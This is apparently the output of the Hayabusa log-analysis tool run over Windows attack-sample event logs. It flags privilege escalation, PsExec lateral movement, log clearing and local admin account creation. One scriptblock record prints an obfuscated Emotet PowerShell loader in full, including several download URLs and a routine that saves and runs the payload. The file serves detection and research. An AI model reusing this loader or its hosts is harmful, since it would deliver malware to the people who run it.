747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 
4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: 
C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 
747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 
19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,info,,PwSh Scriptblock Log,"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::""SecURi`T`ypRO`T`oCOL"" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F 
[CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').""S`Plit""([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.""d`OWN`load`FIlE""($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).""le`NgTH"" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 
+09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 
00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): 
Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account 
Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:22.974 
+09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 
00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: 
